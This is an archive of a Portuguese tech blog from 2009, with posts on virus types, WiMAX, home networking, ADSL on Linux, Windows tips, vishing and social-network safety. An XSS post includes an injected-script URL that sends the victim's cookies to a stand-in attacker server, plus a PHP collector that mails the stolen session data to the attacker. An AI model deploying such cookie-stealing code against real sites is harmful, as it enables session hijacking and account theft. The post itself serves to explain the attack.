25 dezembro, 2009

Tipos de Vírus

Vírus de disco

Os vírus de disco infectam o boot-sector. Esta é a parte do disco rígido respinsável pela manutenção dos ficheiros de arranque. Da mesma maneira que uma biblioteca precisa de um índice para saber onde se encontram os livros, um disco precisa de ter uma tabela com o endereço dos dados armazenados. Qualquer operação de leitura ou escrita de um ficheiro, precisa do uso dessa tabela. Gravar ou carregar o ficheiro numa disquete infectada possibilita a activação do vírus, que pode infectar outras disquetes e o disco rígido.

Vírus de ficheiro

Estes vírus infectam os ficheiros executáveis ou de extensão .SYS, .OVL, .MNU, etc. Estes vírus copiam-se para o início ou para o fim do ficheiro. Desta maneira, ao abrir o programa X, o vírus activa-se e executa ou não outras tarefas e só depois inicia o verdadeiro programa.

Vírus multi-partie

Infectam tanto a disquete como os ficheiros executáveis. São extremamente sofisticados.

Vírus Tipo DIR-II

Alteram a tabela de ficheiros de forma a serem chamados antes do ficheiro programa. Nem são propriamente FILE-INFECTORS nem são realmente BOOT-INFECTORS e muito menos multi-partites.

19 dezembro, 2009

WiMAX: Procurando a liberdade

O funcionamento do WiMAX para poder ser concretizado devem-se implantar estações de cobertura em locais específicos, para que uma determinada região tenha acesso ao serviço. As antenas devem estar direccionadas para as zonas onde se encontram os subscritores do serviço de modo a que o sinal emitido pelas estações chegue até ao utilizador final. Mas, tal como nas redes de telemóveis, não é necessário ter o campo de sinal directo (sem obstrução) entre a antena do receptor (utilizador) e o transmissor (equipamento) para as faixas com uma largura de banda inferior a 10GHz.

Como a estrutura das redes de telemóveis já está num patamar tecnologicamente evoluído, a tendência é que as novas empresas comecem a aplicar o WiMAX e aproveitem os espaços vagos nas torres de antenas de telemóveis e outros locais para instalar os seus equipamentos, evitando assim o aparecimento de novas torres, as quais são extremamente difíceis de viabilizar, devido às leis cada vez mais duras da colocação das antenas de transmissão nas localidades e à escassez de terrenos ou locais disponíveis.

O desenvolvimento da tecnologia, com as técnicas de modulação e eficiência dos rádios transmissores e receptores permite uma evolução da mobilidade do utilizador. Por isso, várias revisões da norma IEEE 802.16 têm sido efectuadas, onde a cada nova versão mais mobilidade é adicionada. A tabela seguinte mostra a sua evolução.

Acesso Dispositivos Velocidade Handoff
Fixo Modem indoor e outdoor Parado Não
Nómada Modem indoor e cartões PCMCIA Parado Não
Portátil cartões PCMCIA e chips em laptops Andando Hard handoff
Móvel (baixa velocidade) Cartões PCMCIA e chips em laptops veículo a baixa velocidade (menos que 40 Km/h) Hard handoff
Móvel (alta velocidade) Cartões PCMCIA, PDA, Smartphone Veículo a alta velocidade (acima de 40 Km/h) Soft handoff

 

Handoff é um termo técnico adoptado para indicar toda a troca de canal e estação, sem que o utilizador perceba, dando assim continuidade à comunicação.

Segundo a visão da Intel (uma das maiores fabricantes de chips para computadores do mundo, parceira dos fabricantes de equipamentos e que desenvolve chips para a tecnologia WiMAX), todos os equipamentos que têm a função de computação (portáteis, palms, PDA, etc.) tendem a ter integração com sistemas de comunicação de banda larga. E todos os equipamentos que têm função de comunicação (telemóveis, smartphones, rádios, etc.) tendem a ter aumento na sua capacidade de computação. Portanto, será impossível desvincular a computação da comunicação.

em desenvolvimento

14 dezembro, 2009

Cross-Site Scripting (XSS)

Cross-site scripting (XSS) é a melhor forma de ataque contra a rede interna de empresas. O XSS permanece como o ataque mais popular contra todos porque é fácil de encontrar e de executar, enquanto que as consequências deste ataque podem ser devastadoras. O XSS é normalmente mencionado durante a discussão de exploração de falhas de segurança no lado do cliente. Neste artigo vou assumir que estás familiarizado com o conceito do XSS. O objectivo desta entrada é demonstrar como os hackers sofisticados de hoje em dia conseguem ter a maior das vantagens com as falhas do XSS.

O monte de dados que está a ser repassado entre utilizadores e aplicações online é impressionante. Parece que qualquer função empresarial mais significante tem uma interface web para gestão e utilização dos dados. A enorme informação sensível que é transmitida em transacções online torna os roubos online apelativos e muito lucrativos. Dos vários ataques online, o XSS permanece como um dos mais proliferantes. Apesar do grande número de técnicas que existem para o ataque de XSS, apenas vou exemplificar alguns ataques que estão direccionados para o roubo de informações dos utilizadores. Estes ataques aumentam em complexidade e podem ser utilizados como ponto de partida para ataques mais evoluídos.

P.S.: Todos exemplos aqui mostrados possuem erros de programação colocados de propósito de forma a não serem utilizáveis. Pois eu não poderei saber se uso que lhes dessem seria de uma maneira positiva ou negativa.

 

Roubando Sessões

Muitas vezes os hackers utilizam o XSS para roubar as sessões dos utilizadores. De seguida vou demonstrar o “Ola Mundo” dos ataques XSS. O mais simples parece-se com isto:

http://servidorvulneravel.pt/falha.jsp?parameter=”><script> doc.loc=http://servidoratacante.pt/apanhacookies.php?cookie=+”doc.coo+”&loca=”+doc.loc;</script>

O cabeçalho inserido envia os cookies do utilizador para o servidor do atacante. No servidor do atacante, o ficheiro apanhacookies.php guardar os valores do cookie e notifica o atacante de uma invasão bem sucedida:

<?php
if(($_GET[‘cookie’] == “”)||($_GET[‘loc’] == “”))
{
// nenhuma acção necessária
}
else
{
// Cookies roubados e localização
$cookie=$_GET[‘cookie’];
$location=$_GET[‘location’];
//Notifica o atacante
$stolencookies = “ Abre o navegador: “ . $location . “;
\r\n Define o cookie: javascript:document.cookie=’”. $cookie . “’;
\r\n Rouba a sessão!: “ . $location;
$name = “Outra vitima”;
$email = “vitima@sessãoroubada.com";
$recipient = “atacante@ataque.com”;
$email_body = $stolencookies;
$subject=”Mais um caiu na falha – “ .$location;
$header= “De: “ .$Name

Sim é assim tão simples. Com o código PHP no servidor do atacante, roubar uma sessão é como tirar doces a uma criança.

11 dezembro, 2009

Escândalo Magalhães e a password de controlo parental

Este é um daqueles exemplos de uma notícia sensacionalista publicada nesta república das bananas. Qualquer pai mais atento já sabia qual é a password e todos sabemos que está disponível na Internet na página da SeguraNet.

Agora não venham as Associações de Pais queixarem-se devido a isto, após este tempo todo. Pois eles PAIS em agregados familiares onde o Magalhães e o único computador presente para utilização, pais esses que muitas vezes pedem aos técnicos de informática para removerem a dita password desactivando o controlo parental para terem acesso aos sites todos que desejam visitar e depois dizem que os filhos andam a ver pornografia…

Não é de admirar a culpa começa em casa… É o que acontece quando não se lê o manual de instruções, senão trazia manual é porque não trazia; agora se o trás ninguém lhe toca. Todos sabemos que o código PIN do multibanco é secreto, e alguns de nós têm a atenção de o mudarem, então porquê é que não mudam a password do Controlo Parental? Optam por permitir acesso indiscriminado e depois reclamam porque os filhos vêm o que não deviam ver. A culpa é de todos porque a nossa sociedade ainda não está consciente dos perigos presentes na Internet.

Sinceramente acho que é mesmo a lei do criticar tudo e todos e não fazer nada para mudar as coisas. Pois é mais fácil falar mal, do que tentar mudar algo.

Atentamente
Matafome

10 dezembro, 2009

Como colocar computadores antigos (386, 486) em rede?

O processo é o mesmo utilizado para ligar os computadores de última geração. Serão necessárias duas placas de rede compatíveis com o modelo dos computadores, os seus respectivos drivers e o cabo crossover para fazer a ligação.

A diferença está no sistema operativo instalado nestes computadores. Dependendo da configuração do computador, isso pode não funcionar em versões mais actuais do Windows. Tente experimentar com o Windows 95 ou distribuições do Linux. Basta ligar a placa ao computador, configurar o dispositivo com os drivers do fabricante e ligar aos outros computadores da rede.

É possível a criação de uma rede USB entre dois computadores?

Sim; mas apesar de a ideia parecer boa, este tipo de ligação não tem um desempenho comparado ao do padrão Ethernet. A montagem da rede é muito simples, você precisa de um cabo do tipo USB Data Link, dos drivers de instalação do cabo e da versão do Windows que deseja utilizar e de uma porta USB disponível em cada computador.

O cabo, também conhecido como A/B, é especialmente feito para estabelecer esta ligação. Ele possui duas pontas iguais com um adaptador no meio para lidar com os dados transmitidos entre os computadores.

O próximo passo é instalar os drivers do cabo nos computadores. Além disso, o Windows pedirá o disco em algumas situações. É de lembrar que este método só permite a transmissão dados, o que não vai permitir que tenha acesso a dispositivos como CD-ROM, impressoras e afins.

09 dezembro, 2009

Redes sociais para crianças

A Internet possui montes de redes sociais, mas normalmente o seu uso é para maiores de 13 anos. Estas redes excluem um público emergente as crianças.Existem motivos para se preocupar com os seus filhos estão prestes a entrar nestas redes direccionadas para os mais velhos. As informações que circulam por estes espaços não costumam ter algum tipo de filtro, para piorar isto tudo, a pedofilia é um problema cada vez mais evidente na Internet.

O que fazer então para estas crianças? Direccionado para este público tão específico foram criadas redes sociais com uma segurança melhorada.

Club Penguin

Uma rede social gratuita da Disney, Club Penguin é um mundo virtual criado em Flash onde os pinguins controlam. Divertida, esta rede social permite criar um avatar de um penguin que será utilizado para explorar tudo em volta.

Em cada cenário é possível ver representações visuais dos outros utilizadores ligados, como trocar mensagens e participar em jogos como dança e surf. Os jogos podem ser feitos individualmente ou em grupo, o que aumenta a interacção entre utilizadores.

As actividades rendem moedas, mas para utilizá-las é necessário ser assinante. As moedas permitirão comprar acessórios e itens.

Ao registar uma criança, um e-mail de autorização vai ser enviado para o responsável adulto para que a activação seja feita. Cabe também ao responsável estabelecer qual o tipo de mensagens que depois pode ser trocado pela criança.

A favor: ambiente rico e divertido, com muita coisa para explorar.
Contra: mesmo sendo muito visual, demora um bocado a descobrir as funções e os jogos.

Endereço: http://www.clubpenguin.com/pt/

 

Stardool

É um ambiente onde se pode vestir bonecas, a Stardoll tem uma temática direccionada para as meninas.

O seu público alvo situa-se entre a faixa dos 7 aos 17 anos, só que para menores de 13 anos o serviço utiliza um ambiente seguro, onde a criança não pode divulgar informações particulares ou não pode enviar mensagens ou comunicar nos foruns.

Todas as palavras passam por um filtro que bloqueia as palavras impróprias. Uma comunidade de moderadores, automáticos e humanos, examina cada recanto do serviço procurando infracções e os próprios membros são incentivados a denunciar abusos.

Ao se registar a criança precisa de inserir o e-mail de um responsável, que autorizará ou não a sua participação. Embora possua recursos interessantes de comunicação e interacção com outros jogadores, este só pode ser utilizado se os pais desactivarem a protecção para menores de 13 anos.

Do meu ponto de vista, é necessário uma mudança na educação das crianças. A segurança dos mais novos está assente nos pilares da educação, conversa e participação. É cada vez mais difícil controlar tudo o que as crianças fazem na Internet, o que devemos fazer é indicar-lhes os sitios que podem aceder, alertá-las para os perigos e ensiná-las a se protegerem.

Recomendo quando escolherem uma rede social para os vossos filhos, que tenha uma empresa a dar suporte, e que essa mesma rede possua filtro de conteúdos.

Endereço: http://www.stardoll.com/pt/

Possui dois computadores e quer interligá-los?

Existem duas formas de se colocar dois computadores em rede através de um cabo crossover ou instalando um roteador com ou sem fio. Pelo primeiro método, você deve ter placas de rede nos dois computadores com conectores RJ-45 e um cabo crossover compatível. Após ligá-los às placas, configure o sistema para que eles possam comunicar. Entre no Painel de Controlo, seleccione Opções de Rede ou Ligações de Rede, abra as propriedades da ligação e active a partilha de impressora e ficheiros. Se tiver de instalar algum protocolo, siga as instruções fornecidas pelo sistema.

O segundo método, com o routeador, é mais interessante se o local possui ligação à Internet, sendo que cada um deve receber o sinal de forma independente. Compre um routeador com ou sem fio, ligue-o apenas a um dos computadores e instale o software que acompanha o produto, seguindo todas as instruções. feito isto, basta apenas ligar o routeador ao outro computador e entrar na opção de Redes ou Ligações de Rede dos sistemas. Você deverá fornecer um nome de rede igual aos dois computadores. Ao concluir o processo, os computadores poderão partilhar ficheiros, impressoras, Internet e outros recursos.

Colocar a sua ligação ADSL a funcionar no Linux?

O primeiro passo para configurar a sua ligação ADSL no Linux é instalar o RP-PPPoE. Praticamente todas as distribuições actuais já o trazem incluído, mas é melhor utilizar a última versão. Para começar o processo de configuração depois de instalado o RP-PPPoE digite:

adsl-setup

Aparecerá uma mensagem de apresentação do sistema. Em seguida será pedido as informações da ligação:

Username

Aqui, você deve introduzir o seu nome de utilizador do PPPoE, em regra geral fo formato utilizador@isp.pt, como nomedaconta@sapo.pt

Após isto aparecerá:

Interface

Enter the Ethernet interface connected to the ADSL modem.
For Solaris, this is likely to be something like /dev/hme0.
For Linux, it will be ethn, where ‘n’ isa  number.
(default eth0):

Isto quer dizer que você deve digitar a interface Ethernet na qual o modem se encontra ligado. Se houver apenas uma placa de rede, provavelmente ela será /dev/eth0, a primeira interface padrão no sistema. De seguida, defina se o seu computador deve manter a ligação activa por tempo indefinido, ou seja colocá-lo no modo “on demand”, que desliga a ligação se não for utilizada a Internet por um certo período de tempo. A mensagem é a seguinte:

Do you want the link to come up on demand, or stay up continuosly? If you want it to come up on demand, enter the idle time in seconds after which the link should be dropped. If you want the link to stay up permanently, enter ‘no’ (two letters, lower-case).
NOTE: Demand-activated links do not interact well with dynamic IP addresses. You may have some problems with demand-activated links.
Enter the demand value (default no):

Aqui, digite ‘yes’ para ligação sob pedido ou ‘no’ para ligação permanente. Recomendo seleccionar a opção ‘no’ para deixar o seu computador ligado por tempo indeterminado.
O próximo passo é a configuração do DNS da máuina. Estes dados, devem ser fornecidos pelo seu ISP. Nalguns casos, o endereço pode não funcionar correctamente. Para resolver este problema digite ‘server’. Isto fará com que o sistema procure pelo DNS automaticamente.

Please enter the IP address of your ISP’s primary DNS server. If your ISP claims that ‘the server will provide DNS addresses’, enter ‘server’ (all lower-case) here. If you just press Enter, I will assume you know what you are doing and not modify your DNS setup.
Enter the DNS information here:

Após definir o DNS, digite a senha de acesso ao ISP de ADSL. Em seguida, confirme a senha:

Please enter your PPPoE password:

Após definir o DNS, é hora de definir as configurações de firewall do Linux. O sistema providenciará um grupo de regras básicas para esta tarefa. É aconselhável realizar um upgrade destas regras assim que o procedimento estiver completo. O sistema mostrará a seguinte mensagem:

Please choose the firewall rules to use. Note that these rules are very basic. You are strongly encouraged to use a more sophisticated firewall setup; however, these will provide basic security. If you are runing any servers on your machine, you must choose ‘NONE’ and set up firewalling yourself. Otherwise, the firewall rules will deny access to all standard servers like Web, Mail, FTP, etc. if you are using SSH, the rules will block outgoing SSH connections which allocate a privileged source port.
The firewall choices are:

0 – NONE: This script will not set any firewall rules. You are responsible for enuring security of your machine. You are STRONGLY recommended to use some kind of firewall rules.

1 – STANDARD: Appropriate for a basic stand alone web surfing workstation.

2 – MASQUERADE: Appropriate for a machine acting as an Internet Gateway for a LAN.

Choose a type of firewall (0-2):

O sistema fornecerá três opções para a configuração do seu firewall. Ao pressionar 0, você dirá ao sistema para não aplicar qualquer regra de protecção, o que é desaconselhável. A opção 1 o ajustará para uma estação de trabalho, ou seja, um único computador com privilégios de acesso à Internet. A opção 2 é indicada para um computador que funciona como ponto de distribuição da partilha da ligação à Internet para uma rede local.
O Linux perguntará se o utilizador deseja iniciar a ligação sempre que o computador for ligado:

Start this connection at boot time. Please enter no or yes:

Neste caso, “yes” guardará a onfiguração, enquanto “no” fará com que você tenha de digitar o comando adsl-start sempre que desejar ligar à Internet. No final do procedimento, o computador mostrará os seguintes dados sobre a sua ligação:

Ethernet Interface: eth0
User name: como nome@sapo.pt
Activate-on-demand: No
DNS: (DNS do ISP)
DNS2: (DNS do ISP)
Firewalling: STANDALONE
Accept these settings and adjust configuration files (y/n)?

Se estiver de acordo carregue em ‘y’. O sistemá fará a cópia de segurança dos ficheiros antigos e mostrará a seguinte mensagem:

Adjusting /etc/ppp/pppoe.conf
Adjusting /etc/ppp/pap-secrets and /etc/ppp/chap-secrets
(But first backing it up to /etc/ppp/pap-secrets-bak)
(But first backing it up to /etc/ppp/chap-secrets-bak)
Congratulations, it should be all set up!
Type ‘adsl-start’ to bring your ADSL link and ‘adsl-stop’ to bring it down. Type ‘adsl-status’ to see the link status.

O sistema está configurado. Digite adsl-start para iniciar a ligação, adsl-stop para interromper e adsl-status para ver as informações da rede.

06 dezembro, 2009

Vishing

Vishing é uma prática crime da utilização de engenharia social através do sistema telefónico, normalmente utilizando opções disponíveis em Voz sobre IP (VoIP), para ganhar acesso a dados privados e informação financeira do público alvo de forma a obter recompensa monetária. O termo é uma combinação de “voice” (voz) e “phishing” (pesca). O vishing explora os serviços das redes de telefone públicas, que tradicionalmente tem terminações locais que estão identificadas pela companhia dos telefones, e tem associado um cliente que paga pelo serviço. A vítima muitas vezes não está informada que o VoIP torna mais fácil a falsificação de identidade com o Spoof do ID, criando sistemas complexos automáticos (IVR), de baixo custo e o anonimato para o cliente amplamente disponível. O Vishing é normalmente utilizado para roubar números de cartões de crédito, ou noutros esquemas de roubo de identidade da vítima.

O Vishing é muito mais difícil de monitorizar e detectar. Para se protegerem, os consumidores são aconselhados para serem muito desconfiados relativamente quando recebem mensagens a dizerem para eles telefonarem para fornecer o número do cartão de crédito ou o número da conta bancária. Em vez de fornecer qualquer informação, recomendo os leitores a contactarem o seu banco ou instituição de crédito para verificarem a validade da mensagem.

Existe tecnologia que monitoriza todas as redes públicas comutadas de telefones (PSTN), baseado no comportamento do tráfego podem ser detectadas tentativas de vishing como um resultado de anomalias durante a chamada. Um exemplo é múltiplas chamadas de um número limitado de números do Skype para Call Centers.

Exemplo:

  1. O criminoso configura um dialer (programa de realização de chamadas) para números de telefone de uma determinada zona ou acede ao correio de mensagens de voz de uma companhia com a lista de números de telefone roubadas de uma instituição financeira.
  2. Quando a vítima atende a chamada, uma gravação automática, normalmente criada utilizando sintetizadores de texto para voz, é reproduzida para avisar o consumidor que o seu cartão de crédito foi alvo de actividade fraudulenta ou que a conta bancária teve uma actividade fora do normal. A mensagem depois indica que o consumidor deve telefonar para um número de telefone imediatamente. O mesmo número de telefone é normalmente mostrado na Identificação do número que está a ligar e mostra o mesmo nome que a instituição financeira possui.
  3. Quando a vítima telefona para o número, a chamada é atendida de forma automática dando instruções para se introduzir o número do cartão de crédito ou introduzir o número da conta bancária no teclado
  4. Quando a vítima introduz os seus dados do cartão de crédito, ou da sua conta bancária, o visher passa a possuir a informação necessária para fazer uma utilização fraudulenta do cartão ou para ter acesso à conta.
  5. A chamada normalmente pede mais dados adicionais tais como o PIN de segurança, data de validade, data de nasciment, etc.

É como se fosse uma variação do phishing realizado por e-mail.

Exemplo de notícias sobre vishing:

BBC News: http://news.bbc.co.uk/2/hi/technology/5187518.stm

The Register: http://www.theregister.co.uk/2008/01/21/fbi_vishing_warning/

Atentamente Matafome

Facebook Vs Hi5? Qual o mais seguro?

Olá a todos esta entrada no meu blog é dedicada a uma luta de titãs das redes sociais Facebook Versus Hi5. Vamos tentar descobrir qual o melhor….

Hi5 (2005-actualidade) – Falha de segurança que permite a utilização do exploits utilizando XSS.

Facebook (2008 aquando da actualização do novo design) – Os dados definidos como privados de utilizadores simplesmente deixaram de ser tão privados passaram a estar vísiveis para todos. Ou seja o design que implementaram ainda estava em fase Beta, por outras palavras, meteram uma versão não concluída em funcionamento dando origem a esta gravíssima falha. Março do mesmo ano uma falha de segurança permitiu o acesso às fotos privadas dos utilizadores.

Ataque de phisihing (2008) – Ambas as redes sociais foram atacadas pelo menos 50 sites aparentavam ser as páginas do hi5 e do facebook. Enviando e-mails com hiperligações para essas páginas ao observarem a página tal e qual o utilizador introduzi-a os dados pensando tratar-se da página real e infelizmente era uma cópia.

Para se protegerem deste último exemplo, digitem sempre o endereço na barra de endereço do vosso navegador de Internet, para terem a certeza que estão no endereço correcto.

Resultado: 50% Hi5 – 50% Facebook

As redes sociais não seguras, não devemos colocar lá dados pormenorizados sobre nós próprios, podemos usar alcunhas, localidades nunca metam a real, metam região assim estão mais protegidos a data de nascimento não metam nada disso. Aceitem apenas pedidos de amizade de pessoas que conhecem. De preferência antes de aceitarem troquem mensagens com a pessoa para terem a certeza que é ela. E tomem atenção pois este tipo de redes são as preferidas pelos Predadores Sexuais, por isso tenham cuidado com quem se relacionam… Não interessa se têm 5 amigos ou 50 mil amigos, interessa é que os conheçam de certeza.

Atentamente Matafome

30 novembro, 2009

Conta de Administrador desapareceu

Quando se criam contas de utilizadores regulares, a conta pré-definida do Administrador desaparece do ecrã de Login, que costumavas ver quando iniciavas sessão. Pressiona Ctrl+Alt+Del duas vezes no ecrã de Login para obteres o diálogo standard de Login. Podes iniciar sessão como Administrador a partir daqui. Para mudares de contas de utilizadores clica em Terminar Sessão no menu iniciar. Então vais ver o ecrã de Terminar Sessão. Clica no botão Mudar de Utilizador, e vais ser enviado para o ecrã de Login onde podes seleccionar e entrar com outras contas.

Aumentar a velocidade do Mozilla Firefox

Olá a todos nesta entrada vou-vos ensinar como aumentar a velocidade do navegador da Internet Mozilla Firefox.

  1. Digita about:config na linha de endereço e pressiona Enter
  2. Define o valor de network.http.pipelining como “true”
  3. Define o valor de network.http.pipelining.maxrequests para 100
  4. Define o valor de network.http.proxy.pipelining para “true”
  5. Define o valor de nglayout.initialpaint.delay para “0” (esta opção não se encontra disponível em versões mais recentes)

E voilá… Aumentas-te a velocidade do teu navegador da Internet

Converter sistema de ficheiros de Fat32 para NTFS

Abre uma linha de comandos do MS-DOS e digita o comando:

convert c: /fs : ntfs



Este comando vai converter o teu sistema de ficheiros da drive c para ntfs.



Se o sistema não conseguir ter acesso exclusivo à drive, vai ser dada a escolher a opção de ele fazer essa conversão quando o computador reiniciar.



Normalmente deves seleccionar Yes.



A conversão de Fat/Fat32 para NTFS não é destrutiva, os dados na drive NÃO SERÃO DESTRUÍDOS.



Tem em atenção que a conversão de FAT para NTFS vai tornar a tua drive ilegível para os programas do MS-DOS a menos que tenhas os utilitários do NTFS para a realização desses procedimentos em DOS.

29 novembro, 2009

Aumentando a segurança do Windows XP

Se trabalhas num ambiente onde várias pessoas podem ter acesso ao teu equipamento onde guardas os teus dados pessoais, bem existe uma técnica que permite aumentar a tua segurança.

Podes aumentar o nível de segurança ao teu Windows XP. Este procedimento é chamado de protecção da base de dados das tuas contas do XP. Podes guardar toda a informação relativa às tuas contas numa disquete encriptada. Ou seja o que acontece se tu não tiveres acesso à disquete, não podes aceder ao sistema. Para teres a certeza garanto-te que não tens acesso mesmo que conheças a combinação de Utilizador/Password. Ou seja não consegues aceder ao sistema enquanto não tiveres esta disquete inserida.

O processo de criar esta disquete de arranque seguro de criação desta disquete de arranque seguro é simples.

  • Vai ao menu Iniciar e clica em Executar
  • Digita syskey e clica em Ok. Vai abrir uma janela.
  • Carrega no botão Actualizar
  • Vai abrir uma nova janela onde tens acesso às opções onde podes gravar a base de dados das contas seja localmente seja na tua disquete.
  • Escolhe a disquete e clica em Ok e deixa o procedimento completar. Está feito!

Da próxima vez que iniciares/reiniciares o teu computador e chegares ao ecrã de login verifica se tens a disquete inserida na drive a: senão não poderás aceder.

Reparar a instalação do Windows Installer

Se tiveres problemas na instalação de programas no Windows 2K, XP, 2003 é devido à falta do Windows Installer, no caso de teres o Windows Installer instalado então são problemas da instalação dele próprio.

No caso de te aparecer a mensagem:

“O serviço do Windows Installer não pode ser acedido. Isto pode ocorrer se estiveres a executar em modo de segurança, ou no caso do Windows Installer não ter sido correctamente instalado. Contacta o suporte para assistência.”

Na base de dados da Microsoft (Knowledge Base) no artigo 324516 indica dois métodos para a correcção deste problema, mas podes ter muita sorte se um dos dois métodos corrigir este problema. Muitas pessoas acabaram por formatar os seus sistemas e criando novas instalações do Windows ou tentaram outras maneiras mais variadas para corrigir este problema.

Bem, a solução é muito simples:

  1. Clique direito na drive de instalação do Windows
  2. Clica em Propriedades
  3. Selecciona a Segurança
  4. Clica Adicionar e navega até Conta de Sistema e clica em Adicionar e Ok
  5. Permite Permissões de Controlo Total e clica Aplicar e depois Ok.

Estes passos devem resolver o teu problema com o Windows Installer.

28 novembro, 2009

Não consegues abrir sites seguros?

Aqui à uns tempos não conseguia abrir sites seguros, problema este que me aconteceu quando acedia ao e-banking, pode acontecer em lojas online, então como resolver este problema?

É simples abre o bloco de notas, cria um novo ficheiro e escreve lá o seguinte:

regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll

guardar o ficheiro como > Selecciona Todos os ficheiros, e dá-lhe um nome tal como securecorrige.bat

Depois é só executar o ficheiro e voilá… O teu problema deve ter desaparecido

Ultrapassar a Censura na Internet

Lembro-me de alguém ter perguntado não à muito tempo como passar a censura na Internet quando os sites eram bloqueados pelos Administradores ou mesmo por países limitando um dos nossos direitos mais básicos a nossa liberdade individual, bem espero que isto ajude:

www.zensur.freerk.com

http://en.cship.org/wiki/

Big Brother e o Ndisuio.sys, um novo fenómeno da Internet

Ndisuio.sys, é um ficheiro de sistema misterioso presente no Windows XP e é um driver para o wireless como o wi-fi e o bluetooth. Apesar disso, existem vários características com este ficheiro a descarregar um monte de dados e talvez causando actividade como se estivessemos a sendo observados.

De facto muito dificilmente qualquer informação que este ficheiro descarrega está disponível pela Microsoft tornando as coisas mais suspeitas. Também foi observado que ele estava a transferir dados para grandes companhias tais como Comcast, Road Runner, Time Warner, BTC e Verizon.

As boas notícias, é que este ficheiro duplia os dados enviados/recebidos onde quer que tu vás, ele também envia dados para este ficheiro que não saiem da tua rede/computador logo não é spyware, então não é uma situação em que está a ser observado causando invasão de privacidade. Ele apenas realiza tarefas de comunicação internas e é utilizado pela interface de utilizador do NDIS I/O, hence, NDISUIO. O NDISUIO também é utilizado como driver por muitos programadores de maneira que ele torna certas tarefas wireless mais fáceis de implementar em ligações 802.11x. Algumas firewalls também o utilizam porque ele obtem os dados e os ordena de forma a serem filtrados.

Mas a multiplicação dos dados pode consumir recursos sem motivo nenhum, então desactivá-lo é a melhor coisa a fazer. O valor de dados recebidos é muito elevado, então indica que não são transferências de e para a Internet, mas sim localmente, por isso a actividade da rede é duplicada porque localmente as transferências de dados são mais elevadas.

Para desactivar este ficheiro, vai ao painel de controlo, ferramentas de administração, serviços, Configuração Zero do Wireless, duplo clique e desactiva-o. Este ficheiro deve ser necessário em execução no caso de utilizares dispositivos wireless da Linksys e mais algumas marcas (necessito de confirmação).

27 novembro, 2009

Para os acarus que desejam entrar no hi5…

Tu indíviduo maligno que entras neste blog usando normalmente as palavras chave de pesquisa tais como:

  1. como descobrir as passes do hi5 de outra pessoa
  2. como descobrir password do hi5
  3. descobrir passe hi5
  4. descobrir passes do hi5
  5. descobrir password fdo hi5
  6. descobrir password hi5 programa download (“este aqui já deve saber como usar um motor de pesquisa”)
  7. entrar em perfis privados hi5
  8. hi5 password finder
  9. invadir hi5 privados
  10. programa para descobrir a password hi5
  11. programas hacker para password hi5
  12. saquea passwords hi5 (“bem faltava cá o brazuca”)
  13. descobrir passwords e-mail

Tu mero mortal que desejas fazer maldades, invadindo, destruindo e pura e simplesmente ter acesso á privacidade dos outros foste apanhado, neste blog aqui não terás acesso às maldades. Apenas terás acesso a como te protegeres e técnicas que permitem aumentar a segurança da utilização da Internet. Ou seja a tua pesquisa levou-te ao resultado oposto. Lamento informar-te a tua tentativa correu mal. Talvez te sirva de lição mas acho que devias deixar de ter este tipo de atitude. Devias aproveitar o tempo para fazer o bem, participar em acções de voluntariado… Ter uma atitude pró-activa nesta sociedade de ignóbeis e ignorantes que tentam ter acesso a tudo prejudicando tudo e todos…

Não respeitando qualquer um… Pois acho que se quiseres fazer as atitudes de bem és bem-vindo se vieres com outras intenções, lamento informar-te tenta noutro lado.

A quem o hi5 foi invadido lamento mas não poderei ajudar… Apenas poderei dar a sugestão de visitarem o blog e lerem as entradas sobre segurança de forma a se protegerem.

Atentamente

José Matafome

23 novembro, 2009

Tudo sobre os comandos do mIRC

Aqui tens todos os comandos do mIRC mais utilizados:

/ Chama o comando anterior utilizado na janela actual

/! Chama o último comando digitado em qualquer janela

/action [texto da acção] Envia a acção especificada ao canal activo ou janela privada aberta

/add [-apuce] [filename.ini] Carrega liases, popups, utilizadores, comandos e eventos.

/ame [texto da acção] Envia a acção especificada para todos as janelas e canais onde estás

/amsg {texto} Envia a mensagem especifica a todos os canais onde te encontras.

/auser {nivel} {nick|endereço} Adiciona um utilizador com o nível de acesso especificado à lista de utilizadores remotos.

/away {mensagem de ausência} Define-te como ausente e deixa uma mensagem a explicar porquê é que não estás prestando atenção ao IRC.

/away Define o teu estado como de volta.

/ban [#canal] {nick} [tipo] Bane o nick especificado do canal actual ou de uma canal definido.

/beep {numero} {atraso} Emite o 'número' de apitos localmente com o 'atraso' entre os apitos.

/channel Abre o canal na janela central (apenas trabalha em canais).

/clear Limpa a janela completa actual.

/closemsg {nick} Fecha a janela de conversação que abriste com o nick especifico

/creq [ask | auto | ignore] Define o teu estado de DCC em 'Pedido de chat' nas definições em DCC/Opçõess.

/dcc send {nick} {ficheiro1} {ficheiro2} {ficheiro3} ... {ficheiroN} Envia os ficheiros especificados para o nick.

/dcc chat {nick} Abre uma janela dcc e envia um pedido de dcc ao nick.

/disconnect Força uma desconecção imediata do teu servidor de IRC. Utiliza-o com cuidado.

/dlevel {nivel} Muda o nivel pré-definido de um utilizador numa secção remota.

/exit Força o mIRC a fechar e a sair.

/help {palavra chave} Mostra os comandos básicos do IRC na secção de ajuda do mIRC.

/invite {nick} {#canal} Convida outro utilizador para o canal.

/join {#canal} Faz-te juntar ao canal especificado.

/kick {#canal} {nick} Expulsa o nick especifico do canal especificado.

/list [#string] [-min #] [-max #] Lista todos os canais actualmente disponiveis.

/msg {nic} {mensagem} Envia uma mensagem privada a este utilizador sem abrir uma janela de conversação privada.

/nick {novo nick} Muda o teu nick actual para aquele que desejares.

/part {#canal} Faz-te abandonar o canal definido.

/partall Faz-te sair de todos os canais onde te encontras.

/quit [motivo] Desliga-te do IRC com uma mensagem opcional de adeus.

18 maio, 2009

Livros Online

Uma página excelente na Internet, com links para livros online encontra-se no endereço http://www.hoganbooks.com


Nela vocês vão encontrar livros, em formato html, como "The Complete Idiot's Guide to JavaScript", "Windows 95 Tips, Tricks, and Secrets", e muitos outros.


E o mais surpreendente é que os livros são comercializados no formato tradicional também e são oferecidos por editoras de renome como QUE, O'Reilly e outras. A O'Reilly está disponibilizando o livro "AIX Version 4: System and Administration Guide". Este é um livro em fase beta e ainda não foi lançado. Até ao lançamento ele fica disponível e os interessados podem inclusive fazer uma reserva para a compra do livro.


